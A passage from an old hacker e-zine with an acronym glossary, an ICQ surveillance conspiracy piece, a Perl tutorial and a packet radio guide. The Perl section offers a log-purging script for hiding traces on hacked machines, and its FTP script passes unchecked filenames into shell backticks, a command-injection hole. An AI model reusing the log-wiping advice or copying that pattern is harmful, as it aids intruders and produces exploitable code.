SDN Secure Data Network (USCG Dial-up via STU-III)
SEC Single Enabling Capability
SEMCOR Government Contractor
SEWG System Evolution Working Group
SHA Security Hash Algorithm
SIMWHG Special Intelligence Message Handling Working Group
SIPRNET Secret Internet Protocol Routed NETwork
SMS Service Management System
SMTA Subordinate Message Transfer Agent
SMTP Simple Mail Transfer Protocol
SNMP Simple Network Management Protocol
SNS Secure Network Server
SO Security Officer
SPAWAR Space & Naval Warfare Systems Command
SRA Sub-Registration Authority
SSAMPS Standard Semi-Automated Message Processing System
ST&E Security Test & Evaluation
STU-III Secure Telephone Unit 3rd Generation
SW-II CG Standard Work Station II
SW-III CG Standard Work Station III
TAIS Target Architecture & Implementation Strategy
TCC Telecommunications Center
TCP/IP Transport Control Protocol/Internet Protocol
TEWG Test & Evaluation Working Group
TIIWG Transition Implementation & Integration Working Group
TISCOM Telecommunication & Information Systems Command (USCG)
TT Trouble Ticket
TWG Tactical Working Group
UA User Agent
UNIX Common Operating System
USAF U. S. Air Force
USCG U. S. Coast Guard
USMC U. S. Marine Corps
USMTF U. S. Message Text Format
USN U. S. Navy
VPN Virtual Private Network
W Critic Precedence
WAGB Icebreaker (USCG)
WAN Wide Area Network
WHEC High Endurance Cutter (USCG)
WinNT Windows NT Operating System (SW-III)
WMEC Medium Endurance Cutter (USCG)
X.400 Messaging Message Handling System Standard
X.500 Directory Directory System Standard
Y Emergency Command Precedence (ECP)
Z Flash Precedence
References & Source Material
****************************
U. S. Navy DMS Master Plan
U. S. Navy DMS Transition Plan
U. S. Coast Guard DMS Transition Plan
Lockheed Martin Federal Systems (LMFS) DMS Product Guide
U. S. Navy DMS Ordering Guide
DMS System Design Architecture (SDA)
http://www.disa.mil/
http://fmpweb.nctsw.navy.mil/manual/ManolAUTODIN.htm
http://www.andrews.af.mil/89cg/789cs/System_Flight/autodin.htm
http://www.periscope.ucg.com/terms/t0000059.html
http://www.periscope.usni.com/demo/terms/t0000059.html
http://www.cio.dla.mil/dms/AUTODIN.htm
http://199.209.74.26/mastats.htm
http://www.ld.com/cbd/archive/1995/01(January)/24-Jan-1995/Dawd001.
http://www.af.mil/news/Jan1999/n19990115_990057.html
http://www.daas.dla.mil/daashome/daasc_dars.htm
http://daynt2.daas.dla.mil/daasc_dars.htm
----------
Shouts to D4RKCYDE 9X and B4B0.
http://darkcyde.system7.org
http://hybrid.dtmf.org
http://b4b0.org
http://ninex.com
hybrid@dtmf.org
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use
Comment: I Encrypt, Therefore I Am
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
Oy4=
=Netg
-----END PGP PUBLIC KEY BLOCK-----
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ ICQ Conspiracy ]::::::::::::[OO--[ by camel ]---[ ]::::::::::::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
The ICQ Conspiracy
By Camel
Most of us have heard of or used the Internet communication program called
ICQ. For those of us who have not, it is a client that has chat, email and
other functions built-in. What started my suspicion of this program is that
everybody has their own number. Unlike IRC where servers, hosts, nicknames
and other such things are ever changing... ICQ has a constant. On IRC a law
enforcement agency would have to use a lot of resources and effort to get to
you, such as contacting a server in order to log your chat session. A change
is about to undergo in our government, which will require all corporate CIO's
to obtain a top-level security clearance. They claim it will help reinforce
our nations' technologies security infrastructure. To me it sounds like a
way for the government to control these technology companies who create
hardware and other such technologies as Internet communication tools, e.g.,
ICQ.
Normally, if an agency were to gather intelligence of a suspect under
investigation and wanted to go about it by logging his/her Internet data,
they would have to go through some serious action and obtain something like a
court order. With this new rule in place, any government official who has
the power to do so could order the company to create a backdoor, or something
of the sort, in a program and the company would have to keep their mouth
shut.
It is no secret that the NSA and other such agencies monitor information over
Internet connections, but you might _not_ have known that there are
applications that were purposely made to gather information about a user and
even grab files from your computer. One non-classified example that could be
considered a form of this is known as Enterprise Information Portals. These
are applications that enable companies to unlock internally and externally
stored information, and provide users a single gateway to personalized
information needed to make informed business decisions. Try replacing the
word "business" with "investigation" and see what you come up with.
Now, why ICQ? I already stated that a constant is much easier to monitor and
log than a variable. In addition, ICQ has several normally completely
different communication methods all in one. What is even _better_ is all of
you people using ICQ are Tagged and Numbered for easy tracking. Okay, so
what? The NSA knows my ICQ number is 1777849, if I choose to communicate
something incriminating or very personal I will just create another
account... right? Sure, go ahead. But it is also no big secret that
individual computers give out 'personalized' information which if they logged
you once, they _know_ exactly what to look for and could find your new
account with a scan of some sort.
Well, fuck me sideways! Hey, this wont happen until they change that
security clearance thing will it? Well, the NSA scans every telephone,
Internet, radio and satellite communication in the world for things of
interest such as "terrorism". The government regularly invades your privacy
and what you thought were your rights every single day. You make the call.
I have not uncovered some super secret conspiracy, I have no proof. It just
seems logical that with all these methods of surveillance _proven_ to exist,
I would definitely take advantage of ICQ's 'features'.
With all this in mind... do you trust _your_ ICQ??
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Perl Programming ]:::::[OO--[ by z0mba ]---[ zomba@addicts.org ]:::
-->[OO]:::::::::::::::::::::::::::::::[ http://members.xoom.com/phuk ]:::::::
Okay, so I was sitting there wondering what the hell I could write an article
about and came up with two things, Perl Programming and Setting up an FTP
Server under Linux. I will try and get both these files into f41th 7 but if I
can't then Setting up an FTP Server *will* appear in f41th 8. Anyways, 0n w1f
d4 ph1l3...
Please note: when I start talking in m4d h4x0r t4lk, it is for the benefit of
the lamers that read f41th who are trying to skool themselves cos I know they
just don't understand it otherwise.
Introduction
------------
Perl stands for Practical Extraction and Report Language and is one of the
favourite scipting languages for *nix platforms. If you've never come across
perl code before then it is similar in syntax to C, but with the style of
UNIX shell scripting. Along with that it contains all of the best features
of every other programming language you've eva used (4nd y3s 1 kn0w 4ll j3w
l4m3rs h4v3 n3v3r us3d 4ny pr0gr4mm1ng l4ngu4g3s b4, but j3w w1ll h4v3 t0
t4k3 my w0rd f0r 1t).
Perl is an interpreted language rather than a compiled one (th4t m34ns th4t
34ch st4t3m3nt 1s tr4nsl4t3d 1nt0 s0urc3 c0de 0n3 4t 4 t1m3 4s 3x3cut10n
pr0c33ds r4th3r th4n th3 3nt1re pr0gr4m 4ll 4t 0nc3 l1k3 4 c0mp1l3d 0n3),
which can be either an advantage or a disadvantage whichever way you look at
it. Perl has been ported to virtually every operating system out there, and
most Perl programs will run un-modefied on any system that you move them to.
This is definately an advantage. Its also very useful for all those trivial
day-to-day tasks that you don't want to have to write in C and compile.
The good thing about Perl is that its very forgiving as far as things like
declaring variables, allocating and deallocating memory, and variable types,
so you can actually get down to the business of writing the code. In fact,
those concepts don't actually exist in Perl, this results in programs that
are short and to the point, while similar programs writtn in C might spend
half the code just declaring the variables.
A Simple Perl Program
---------------------
To get you started in the absolute basics of Perl programming, here is a
very trivial Perl program:
#!/usr/bin/perl
print "the man from Del Monte, he say f41th 0wnz j3w\n";
Thats it, simple ain't it. Type that in, save it to a file called
delmonte.pl, chmod +x it, and then execute it, simplicity itself.
If by any chance you are familier with shell scripting languages (n0, 1m
n0t t4lk1ng t0 j3w l4m3rs, 1 kn0w y0u d0n't c0d3), this will look very
familier. Perl basically combines the simplicity of shell-scripting with
the powah of a fully-fledged programming language. The first line of the
program indicates to OS where to find the perl interpreter, this is standard
procedure with shell scripts.
If /usr/bin/perl is not the correct location for Perl on your system, you
can find out where it is located by typing "which perl" at the command line.
If j3w do not have Perl installed you might want to go to www.perl.com and
get it.
The second line does exactly what is says - it prints the text enclosed in
the quotes. The \n is used for a new line character.
Perl Variables and Data Structures
----------------------------------
Unlike most programming languages, Perl doesn't have the concept of data-type
(integer, string, char, etc), but it does have several kinds of variable.
Scalar variables, indicated as $variable, are interpreted as numbers or
strings, as the context warrents. You can treat a variable as a number one
moment and a string the next if the value of the variable makes sense in that
context. There is a large collection of special variables in Perl, such as
$_, $$ and $<, which Perl keeps track of, and you can use if you want to. ($_
is the default input variable, $$ is the process ID, and $< is the user ID).
As you become more familier with Perl, you will probably find yourself using
these variables, and people will accuse you of writing "read-only" code.
Arrays, indicated as @array, contain one or more elements, which can be
referred to by index. For example, $names[12] gives me the 13th element in
the array @names. (its important to remember that numbering starts with 0).
Associative arrays, indicated by %assoc_array, store values that can be
referenced by key. For example, $days{Feb} will give me the element in the
associative array %days that corresponds with Feb.
The following line of Perl code lists all the elements in an associative
array (the foreach construct will be covered later in the phile).
foreach $key (keys %assoc){
print "$key = $assoc{$key}\n"};
NOTE: $_ is the "default" variable in Perl. In this example, the loop
variable is $_ because none was specified.
Conditional Statements: if/else
-------------------------------
The syntax of a Perl if/else structure is as follows:
if (condition) {
statement(s)
}
elseif (condition) {
statement(s)
}
else {
statement(s)
}
condition can be any statement or comparison. If a statement returns any true
value, the statement(s) will be executed. Here, true is defined as:
o--> any nonzero number
o--> any nonzero string; that is, any string that is not 0 or empty
o--> any conditional that returns a true value.
For example, the following piece of code uses the if/else structure:
if ($favorite eq "d4rkcyde") {
print "Yes, d4rkcyde 0wnz.\n"
}
elseif ($favourite eq "PLUK") {
print "NO!, PLUK is l4m3 as sh1t.\n";
}
else {
print "Your favorite grewp is $favorite.\n"
}
Okay I can tell by now that your pretty impressed wif my uber el8 Perl tekniq
and to be honest, I don't blame j3w one bit, now lets get on with some more
in-depth topics.
Looping
-------
Perl has four looping constructs: for, foreach, while, and until.
for
---
The for construct performs a statement (or set of statements) for a set of
conditions defined as follows:
for (start condition; end condition; increment function) {
statement(s)
}
At the beginning of the loop, the start condition is set. Each time the loop
is executed, the increment function is performed until the end condition is
achieved. This looks much like the traditional for/next loop. The following
code is an example of a for loop:
for ($i=1; $i<=10; $i++) {
print "$i\n"
}
foreach
-------
The foreach construct performs a statement (or set of statements) for each
element in a set, such as a list or array:
foreach $name (@names) {
print "$name\n"
}
while
-----
while performs a block of statements while a particular condition is true:
while ($x<10) {
print "$x\n";
$x++;
}
until
-----
until is the exact opposite of the while statement. It will perform a block
of statements while a particular condition is false - or, rather, it becomes
true:
until ($x>10) {
print "$x\n";
$x++;
}
Regular Expressions
-------------------
Perl's greatest strength is in its text and file manipulation. This is
accomplished by using the regular expression (regex) library. Regexes allow
complicated pattern matching and replacement to be done efficiently and
easily. For example, the following one line of code will replace every
ocurrence of the string 'eleet' or the string 'k-rad' with the string 'lame'
in a line of text:
$string =- s/eleet|k-rad/lame/gi;
Without going into too much depth, the following table should explain what
this line actually means:
$string =- [ Performs this pattern match on the text found in the ]
[ varibale called $string. ]
s [ Substitute. ]
/ [ Begins the text to be matched. ]
eleet|k-rad [ Matches the text eleet and k-rad. Something to ]
[ to remember though is its looking for the text eleet ]
[ and not the word eleet, so it will also match the ]
[ text eleet in eleethax0r. ]
/ [ Ends text to be matched, begin text to replace it. ]
lame [ Replaces anything that was matched with the text lame]
/ [ Ends replace text. ]
g [ Does this substitution globally; that is, wherever in]
[ the string you match the match text (and any number ]
[ of times), replaces it. ]
i [ The search text is case-insensitive. It will match ]
[ eleet, Eleet, or ElEeT. ]
; [ Indicates the end of the line code. ]
You might think that replacing a string of text with another is quite a
simple task but the code needed to do that same thing in another language
such as C, is mad big.
Access to the Shell
-------------------
Perl is very useful for admin functions because, for one thing, it has access
to the shell. This means that any process that you might ordinarily do by
typing commands to the shell, Perl can do for you. This is done with the ``
syntax; for example, the following code will print a directory listing:
$curr_dir = `pwd`;
@listing = `ls -la`;
pint "Listing for $curr_dir\n";
foreach $file (@listing) {
print "$file";
}
NOTE: the `` notation uses the backtick found above the tab key, not the
single quote. Thought i'd mention that cos a few people don't even know it
exists (j3w kn0w wh0 j3w 4r3).
Access to the command line is pretty common in shell scripting languages but
is less common in higher level programmning languages.
Command-Line Mode
-----------------
In addition to writing programs, Perl can be used from the command line like
any other shell scripting language. This enables you to smack up Perl
utilities on-the-fly, rather than having to create a file and execute it.
For example, running the following command line will run through the file
foo and replace every occurence of the string k-rad with el8, saving a
back-up copy of the file at foo.bak:
perl -p -i.bak -e s/k-rad/el8/g foo
The -p switch causes Perl to perform the command for all files listed (in
this case, just one file). The -i switch indicates that the file specified
is to be edited in place, and the original backed up with the extension
specified. If no extension is supplied, no backup copy is made. The -e switch
indicates that what follows is one or more lines of a script.
Automation Using Perl
---------------------
Perl is great for automating some of the tasks involved in maintaining and
administering a UNIX machine. Because of its text manipulation abilities
and its access to the shell, Perl can be used to do any of the processes that
you might ordinarily do by hand.
The following sections are basically just examples of Perl programs that you
might use in the daily maintenance of your box.
Moving Files
------------
If for example you run a secure FTP site, then this is how it might work.
Incoming files are placed in an "uploads" directory, when they have been
checked, they are moved to a "private" directory for retrievel. Permissions
are set in such a way that the file is not shown in a directory listing, but
can be retrieved if the filename is known. The person who placed the file on
the server is informed via e-mail that the file is now available for
download.
Seeing as directory listings aren't available it would be a good idea to
make retrievel of the filename available in all-uppercase and all-lowercase
as well as the original filename.
The following Perl program is to perform all those tasks with a single
command. When the file is determined as ready to go onto the FTP site, you
only need to type: move filename user, where filename is the name of the
file to be moved, and user is the e-mail addy of the person who uploaded it
ie: person to be notified.
1: #!/usr/bin/perl
2: #
3: # Move a file from /uploads to /private
4: $file = @ARGV[0];
5: $user = @ARGV[1];
6:
7: if ($user eq "") {&usage}
8: else {
9: if (-e "/home/ftp/uploads/$file")
10: {`cp /home/ftp/uploads/$file /home/ftp/private/$file`;
11: chmod 0644, "/home/ftp/private/$file";
12: `rm -f /home/ftp/uploads/$file`;
13: if (uc($file) ne $file) {
14: $ucfile = uc($file);
15: `ln /home/ftp/private/$file /home/ftp/private/$ucfile`;
16: }
17: if (lc($file) ne $file) {
18: $lcfile = lc($file);
19: `ln /home/ftp/private/$file /home/ftp/private/$lcfile`;
20: }
21:
22: # Send mail
23: open (MAIL, "| /usr/sbin/sendmail -t ftpadmin,$user");
24: print MAIL <<EndMail;
25: To: ftpadmin,$user
26: From: ftpadmin
27: Subject: File ($file) moved
28:
29: The file $file has been moved
30: The file is now available as
31: ftp://ftp.domain.com/private/$file
32:
33: ftpadmin\@domain.com
34: ================================
35: EndMail
36: close MAIL;
37: }
38:
39: else { # File does not exist
40: print "File does not exist!\n";
41: } # End else (-e $file)
42:
43: } # End else ($user eq "")
44:
45: sub usage {
46: print "move <filename> <username>\n";
47: print "where <username> is the user that you are moving this for.\n\n";
48: }
NOTE: domain.com would be replaced with the domain associated with your box.
Without going through the entire code line by line, the following paragraphs
look at some of the points that demonstrate the powah and syntax of Perl.
In lines 4-5, the array @ARGV contains all the command-line arguments. The
place where one argument ends and another begins is taken to be every space,
unless arguments are given in quotes.
In line 9, the -e file tests for the existence of a file. If the file does
not exist, perhaps the user gave the wrong filename, or one of the other
server admins beat you to it. Perl enables you to open a pipe to some other
process and print data to it. This allows Perl to *use* any other program
that has an interactive user interface, such as sendmail, or an FTP session.
Thats basically the purpose of line 23.
The << syntax allows you to print multiple lines of text until the EOF string
is encountered. This eliminates the necessity to have multiple print
commands following one another, ie:
24: print MAIL <<EndMail;
...
35: EndMail
The subroutine syntax allows modularization of code into functions. Sub-
routines are declared with the syntax shown on lines 45-48, and called with
the & notation, as on line 7:
7: ... {&usage}
...
45: sub usage {
...
48: }
Purging Logs
------------
Many programs maintain some variety of logs. Often, much of the info in these
logz is redundant or useless (or maybe unwanted, like if the logz are on a
box j3w just hax0red). The following Perl program will remove all lines from
a file that contain a particular word or phrase, so lines that are not
important or are unwanted can be purged.
1: #!/usr/bin/perl
2: #
3: # Be careful using this program!!
4: # This will remove all lines that contain the given word
5: #
6: # Usage: remove <word> <file>
7: ###########
8: $word=@ARGV[0];
9: $file=@ARGV[1];
10:
11: unless ($file) {
12: print "Usage: remove <word> <file>\n"; }
13:
14: else {
15: open (FILE, "$file");
16: @lines=<FILE>;
17: close FILE;
18:
19: # remove the offending lines
20: @lines = grep (!/$word/, @lines);
21:
22: # Write it back
23: open (NEWFILE, ">$file");
24: for (@lines) { print NEWFILE }
25: close NEWFILE;
26: } # End else
This listing is pretty self-explanatory. It reads in the file and then moves
the lines that contain that string using Perl's grep command, which is
similar to the standard UNIX grep. If you save this as a file called 'remove'
and place it in your path, you will have a quick way to purge server logs of
unwanted messages.
Posting to Usenet
-----------------
If you need to post to Usenet periodically, for example, to post a FAQ, the
following program can automoate the process for you. In the following code,
the text that is posted is read in from a text file, but you can modify it so
that your input can come from anywhere.
This program uses the Net::NNTP module, which is a standard part of the Perl
distribution.
1: #!/usr/bin/perl
2: open (POST, "post.file");
3: @post = <POST>;
4: close POST;
5: use Net::NNTP;
6:
7: $NNTPhost = 'news';
8:
9: $nntp = Net::NNTP->new($NNTPhost)
10: or die "Cannot contact $NNTPhost: $!";
11:
12: # $nntp->debug(1);
13: $nntp->post()
14: or die "Could not post article: $!";
15: $nntp->datasend("Newsgroups: news.announce\n");
16: $nntp->datasend("Subject: FAQ - Frequently Asked Questions\n");
17: $nntp->datasend("From: L4m3r <lame\@loser.com>\n");
18: $nntp->datasend("\n\n");
19: for (@post) {
20: $nntp->datasend($_);
21: }
22:
23: $nntp->quit;
Shout Outs
----------
Thats it for this file, hope its of some help to all you uber hakkahs out
there and I hope that you now realise (if you didn't before) the full
potential of Perl.
[hybr1d] [bodie] [JaSuN] [fORCE] [mranon] [shadow-x] [exstriad] [sonicborg]
[qubik] [downtime] [dialt0ne] [elf] [n1no] [sintax] [xio] [psyclone] [knight]
big up to the d4rkcyde crew
K33p 1t r34l, P34c3
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Packet Radio ]:::::[OO--[ by JaSuN ]---[ jasun@phreaker.net ]::::::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
--oOo--> Packet Radio - Beginners Guide ]------------------
--oOo--> --------------------------------------------------
--oOo--> Main Document Introduction ]---
--oOo--> Amateur Radio Network Introduction ]---
--oOo--> Amateur Radio Packet Network ]---
--oOo--> What Is Communication? ]---
--oOo--> What Is Data Communication? ]---
--oOo--> Introduction to Packet Radio ]---
--oOo--> --* What Is Packet Radio & What Are Its Uses? ]---
--oOo--> --* Hardware Required ]---
--oOo--> --* Packet Radio <-> Internet Communications ]---
--oOo--> --* Packet Radio User Groups ]---
--oOo--> --* Software Required ]---
--oOo--> Radio Amateur Examination ]---
--oOo--> Legal Issues ]---
--oOo--> Glossary Of Terms ]---
--oOo--> Further Reading ]---
--oOo--> Conclusion ]---
--oOo--> Disclaimer ]---
--OoO--> ============================================= ]---
Main Document Introduction:
===========================
In this article I will cover some aspects about the different data
communication systems that are in use today on the Amateur Radio Network.
This article will mainly talk about Packet Radio, but I will write future
ones on the other data modes that are also in use and a more in depth one
about Packet Radio, talking more about the hardware, how to wire everything
up and frequencies used. This is basically a beginners guide, for people
that don't know anything about Packet/Amateur and want to get into it.
Amateur Radio Network Introduction:
===================================
Hopefully by the end of this document, you will understand a little more
about how it all works and what is currently in widespread use/being
implemented. I will discuss the main topics so you could then get yourself
set-up with a station, provided you wanted to and passed the Radio Amateur
Examination test. See the end of this article for further details about the
exam/licence.
Amateur Radio Packet Network:
=============================
This section will give you the information needed to communicate on the ever
increasing Packet Radio Network. It will provide information on the required
hardware equipment, software and also the actual technical side behind the
protocols frequently used. It will cover the basics, and then hopefully
cover some of the more detailed and experimental ideas/trials of new things
that are currently being tested, as well as some good resource sites across
the Internet.
What Is Communication?:
=======================
Have you ever stopped for a period of time and wondered what it would be like
without all of the common communications methods that we use and take for
granted today? What would we do without a Telephone, the Internet or
Television? Most of us would be lost without these things, maybe we could
manage but it would sure be more difficult. Whoever you are, whatever you
do, the chances are you use/enjoy/need one of the above. All of us
communicate in one way or another, those things just make it easier.
What Is Data Communication?:
============================
Most of you will have some idea about what data communication is and how it
can be used in a large number of ways. However, it would probably surprise
you about the number of people that don't have any idea at all. If you are
slightly interested in computers, the Internet or Telecommunications, then
you will know something, probably even something that the next person does
not. Communications in itself, is about sharing information and using it to
our best advantage.
There is the general category of Data Communications, but these can be
divided into smaller sub-categories, either way they will be:
1. Wireless Communications
2. Landline Communications
These can then be further divided into sub-categories,
listed below are a few examples:
1. Telecommunications
2. Amateur Radio
3. Internet
All of those are large networks, which make our life of communications a
lot easier, but not forgetting a lot more enjoyable.
What Is Packet Radio & What Can It Be Used For?
===============================================
Packet Radio is a means of transfer data over wireless links across varying
distances. It can be used for all kinds of different applications and being
it's main use in the Amateur Radio hobby, there is constantly all kinds of
new ideas are being tested out and implemented not only on the software side,
but also on the hardware side of things, as development of new Packet Radio
TNC'S are being developed commercially and by knowledgeable amateurs.
Some of the main uses today are Converse, sending private messages though the
BBS Network, lond distance (DX) contacts and much more.
Hardware Required:
==================
To be able to use Packet Radio you will need a number of Hardware items, as
well as the Software. You will need a Transceiver, TNC, antenna, power
supply, computer and software. It is possible to operate a station
automatically without the use of a computer, by using the TNC alone. However, you will still
need a computer to configure it and the software and to see what is
happening on the air.
The hardware can be expensive, depending on what it is. If you are operating
on CB, it will cost a lot less, as CB equipment is a lot cheaper to buy.
If you want to operate on Amateur Radio, it will cost more, but there is a
lot more to explore and expand on.
Packet Radio <-> Internet Communications:
=========================================
There are a number of Packet <-> Internet links now available that offer
different advantages and services, depending on what they were intended for.
Some links are in place to connect the Converse Network, which is like
Internet Relay Chat (IRC) but over Packet Radio. The links feed the data off
into the Internet, which then appears on the Packet Network in another
country.
By using the Internet, it not only speeds up the Converse Network, but it also
forms a backup if any of the hard Packet Links happen to fail. By using the
Internet as an international link, it allows Packet users from different
countries to talk to each other, as if it were only over Packet, the link
could be easily lost if a few links were to loose connection with each other.
There are also many more services that are available to Packet users, such as
SMTP/NNTP mail, telnet and more. It has to be restricted, so that no
unauthorised users can access the Packet Network from the Internet without
being licensed. The class of IP's 44.*.*.* has been allocated to the
Amateur Packet Radio Network (AMPR). The use of IP over the Packet Network
is slowly increasing, because it has its advantages over the old systems.
It is also possible to play games such as Quake over a fast Packet link,
anything above 9k6 will be okay to play. Even though it might be a little
slow it does work. It would also need to be a Duplex link. One thing about
that though is that you probably would not be able to do it for extended
periods of time because of the transmitter, it would eventually overheat and
could damage the transceiver.
Packet Radio User Groups
========================
Most development across the network is due to the implementation of user
groups that cover the whole of the United Kingdom and also across the world.
As the network is so large, for any major changes to be implemented,
the Amateur Radio hobby has
devoted organisations such as the RSGB
(Radio Society Of Great Britain) to help with not only Packet Radio related
issues, but the whole hobby in general.
It may be referred to as "amateur" but in actual fact, a large portion of the
hobby and in the data communications areas in particular, have a lot of
"experts" that work in the industry everyday and input their knowledge.
Software Required:
==================
A lot of Software is available to get going on Packet. As a user, you will
simply need one of the many clients available, most of which are available
for a number of operating systems. If you were running a BBS, the most
commonly used server Software is FBB which is available for
Linux, Windows and DOS.
Radio Amateurs Examination
==========================
The RAE is an exam issued by City & Guilds, which will give you a
qualification and also allow you to get a valid licence/callsign to legally
use the allotted Amateur Radio frequencies. Usually, you would buy one of
the books that detail what is contained within the exam, then either go
though it on your own or goto lessons.
Then you go and take the exam when you think you are ready, although the
exams are held usually at colleges/clubs about twice a year, usually in May
and November. The exam is multiple choice and is really just based on common
sense, what is detailed in some of the exam books you do not need to know deeply,
just a slight knowledge will suffice. You will probably forget it later on,
unless you actually are interested in any of it and continue to use the
information/techniques in actual practice.
Legal Issues
============
At this point I must stress that to legally use the dedicated Amateur Bands
for anything at all, be it voice/data, you must hold a valid Amateur Radio
Licence. The users will report any unauthorised use to the Radio
Communications Agency (part of the Department Of Trade And Industry) and you
will get traced if you continue. I would suggest that if you would like to
try anything out, join a club first, or visit one and see what it is all
about.
Also, you could try using Packet/other data modes on the Citizens Band radio
on 27mhz, although illegal to use Packet Radio on the CB bands in the UK even
with a valid CB licence, to be honest anything goes when it relates to CB, as far
as today's users are concerned. You will have much more to explore if you
decide to move into the Amateur Bands and it is much more organised and
established. Although in other countries, such as Germany, CB Packet Radio is
also widespread, CB Packet Radio is only illegal in the UK now.
Glossary Of Terms:
==================
There are too many terms to list here, so I will just list a few common ones
that also apply to information contained within this document. There are a
number of good resources on the Internet that list all of them you will need
to know.
AFSK:
Audio Frequency-Shift Keying is a method of digital modulation.
It is a good way of sending digital information over radiowaves.
This method is in use by both Packet Radio modems and Telephone
modems. A zero (0) is sent using one tone and a one (1) is sent
using a different tone.
AX.25:
The protocol used on the Packet Radio Network for
the transmission of data. This protocol borrows the link layer from
X.25 (aka LAPB) modifies it and then adds a datagram address/routing
header on the front. The envelope contains the callsign of the
originating station, the callsign of the target station, addressing,
control and error checking and synchronising.
BBS:
A Bulletin Board System is used for storing and sending bulletins across
the network for users, forwarding private individual messages to the
correct home BBS for whichever user the message is for, also allowing
users to connect to stations which they cannot reach directly by using
the BBS node and many others afterwards if needed. You can also use the
BBS to Digipete if that option is available on the BBS in question.
BPQ:
BPQ is the most common Network Node/Packet Switch Software you will find
that controls Nodes. As it is the most common and widely used,
they are all compatible with each other and work much better with
less initial problems.
PMS:
A Personal Mailbox System is usually built into a TNC and used for
storing private messages to the Sysop of that station. They can be
used for more, e.g. storing bulletins etc, but this is where the BBS
stations come into play.
TNC:
Terminal Node Controller is a piece of hardware (the modem)
which encodes/decodes data packets and talks to the software to
display the information on your monitor. A TNC is self-maintaining
and can be left acting as a Network Node/Digipeter without the need
for anything other than the radio set-up. It can also have a built in
PMS for storing of messages. The TNC also provides error detection
as it assembles/disassembles the data packets.
Further Reading:
================
http://www.packetradio.com - Good site, dedicated to Packet Radio
http://members.xoom.com/ukpg - United Kingdom Packet Group (Now international)
http://www.rsgb.org - Radio Society Of Great Britain
Conclusion
==========
I hope that you enjoyed reading this article and that you actually learned
some new information from it. Even if you are not really interested in
wireless data communications or Packet Radio in general, you may still have
